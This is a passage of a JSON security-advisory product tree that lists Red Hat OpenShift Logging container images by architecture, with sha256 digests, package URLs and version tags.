"name": "openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"product": {
"name": "openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"product_id": "openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/logging-view-plugin-rhel8\u0026tag=v5.7.13-3"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"product": {
"name": "openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"product_id": "openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/loki-rhel8-operator\u0026tag=v5.7.13-12"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"product": {
"name": "openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"product_id": "openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/lokistack-gateway-rhel8\u0026tag=v0.1.0-527"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"product": {
"name": "openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"product_id": "openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/opa-openshift-rhel8\u0026tag=v0.1.0-225"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"product": {
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"product_id": "openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"product_identification_helper": {
"purl": "pkg:oci/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/cluster-logging-rhel8-operator\u0026tag=v5.7.13-7"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"product": {
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"product_id": "openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-rhel8-operator\u0026tag=v5.7.13-9"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"product": {
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"product_id": "openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-proxy-rhel8\u0026tag=v1.0.0-480"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"product": {
"name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"product_id": "openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"product_identification_helper": {
"purl": "pkg:oci/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/log-file-metric-exporter-rhel8\u0026tag=v1.1.0-228"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"product": {
"name": "openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"product_id": "openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"product_identification_helper": {
"purl": "pkg:oci/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/logging-curator5-rhel8\u0026tag=v5.8.1-471"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"product": {
"name": "openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"product_id": "openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch6-rhel8\u0026tag=v6.8.1-408"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"product": {
"name": "openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"product_id": "openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"product_identification_helper": {
"purl": "pkg:oci/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/eventrouter-rhel8\u0026tag=v0.4.0-248"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"product": {
"name": "openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"product_id": "openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/fluentd-rhel8\u0026tag=v1.14.6-215"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"product": {
"name": "openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"product_id": "openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/kibana6-rhel8\u0026tag=v6.8.1-431"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"product": {
"name": "openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"product_id": "openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"product_identification_helper": {
"purl": "pkg:oci/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/logging-loki-rhel8\u0026tag=v2.9.6-15"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"product": {
"name": "openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"product_id": "openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"product_identification_helper": {
"purl": "pkg:oci/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/vector-rhel8\u0026tag=v0.28.1-57"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"product": {
"name": "openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"product_id": "openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/logging-view-plugin-rhel8\u0026tag=v5.7.13-3"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"product": {
"name": "openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"product_id": "openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/loki-rhel8-operator\u0026tag=v5.7.13-12"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"product": {
"name": "openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"product_id": "openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"product_identification_helper": {
"purl": "pkg:oci/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/lokistack-gateway-rhel8\u0026tag=v0.1.0-527"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"product": {
"name": "openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"product_id": "openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/opa-openshift-rhel8\u0026tag=v0.1.0-225"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"product": {
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"product_id": "openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd?arch=arm64\u0026repository_url=registry.redhat.io/openshift-logging/cluster-logging-rhel8-operator\u0026tag=v5.7.13-7"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"product": {
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"product_id": "openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d?arch=arm64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-rhel8-operator\u0026tag=v5.7.13-9"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"product": {
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"product_id": "openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327?arch=arm64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-proxy-rhel8\u0026tag=v1.0.0-480"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"product": {
"name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"product_id": "openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"product_identification_helper": {
"purl": "pkg:oci/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201?arch=arm64\u0026repository_url=registry.redhat.io/openshift-logging/log-file-metric-exporter-rhel8\u0026tag=v1.1.0-228"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"product": {
"name": "openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"product_id": "openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"product_identification_helper": {
"purl": "pkg:oci/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae?arch=arm64\u0026repository_url=registry.redhat.io/openshift-logging/logging-curator5-rhel8\u0026tag=v5.8.1-471"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"product": {
"name": "openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"product_id": "openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910?arch=arm64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch6-rhel8\u0026tag=v6.8.1-408"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"product": {
"name": "openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"product_id": "openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"product_identification_helper": {
"purl": "pkg:oci/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9?arch=arm64\u0026repository_url=registry.redhat.io/openshift-logging/eventrouter-rhel8\u0026tag=v0.4.0-248"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"product": {
"name": "openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"product_id": "openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6?arch=arm64\u0026repository_url=registry.redhat.io/openshift-logging/fluentd-rhel8\u0026tag=v1.14.6-215"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"product": {
"name": "openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"product_id": "openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc?arch=arm64\u0026repository_url=registry.redhat.io/openshift-logging/kibana6-rhel8\u0026tag=v6.8.1-431"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"product": {
"name": "openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"product_id": "openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b?arch=arm64\u0026repository_url=registry.redhat.io/openshift-logging/logging-loki-rhel8\u0026tag=v2.9.6-15"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"product": {
"name": "openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"product_id": "openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4?arch=arm64\u0026repository_url=registry.redhat.io/openshift-logging/vector-rhel8\u0026tag=v0.28.1-57"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"product": {
"name": "openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"product_id": "openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"product_identification_helper": {
"purl": "pkg:oci/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43?arch=arm64\u0026repository_url=registry.redhat.io/openshift-logging/logging-view-plugin-rhel8\u0026tag=v5.7.13-3"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"product": {
"name": "openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"product_id": "openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f?arch=arm64\u0026repository_url=registry.redhat.io/openshift-logging/loki-rhel8-operator\u0026tag=v5.7.13-12"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"product": {
"name": "openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"product_id": "openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"product_identification_helper": {
"purl": "pkg:oci/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49?arch=arm64\u0026repository_url=registry.redhat.io/openshift-logging/lokistack-gateway-rhel8\u0026tag=v0.1.0-527"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"product": {
"name": "openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"product_id": "openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"product_identification_helper": {
"purl": "pkg:oci/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5?arch=arm64\u0026repository_url=registry.redhat.io/openshift-logging/opa-openshift-rhel8\u0026tag=v0.1.0-225"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"product": {
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"product_id": "openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/cluster-logging-rhel8-operator\u0026tag=v5.7.13-7"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"product": {
"name": "openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"product_id": "openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/cluster-logging-operator-bundle\u0026tag=v5.7.13-16"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"product": {
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"product_id": "openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-rhel8-operator\u0026tag=v5.7.13-9"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"product": {
"name": "openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"product_id": "openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"product_identification_helper": {
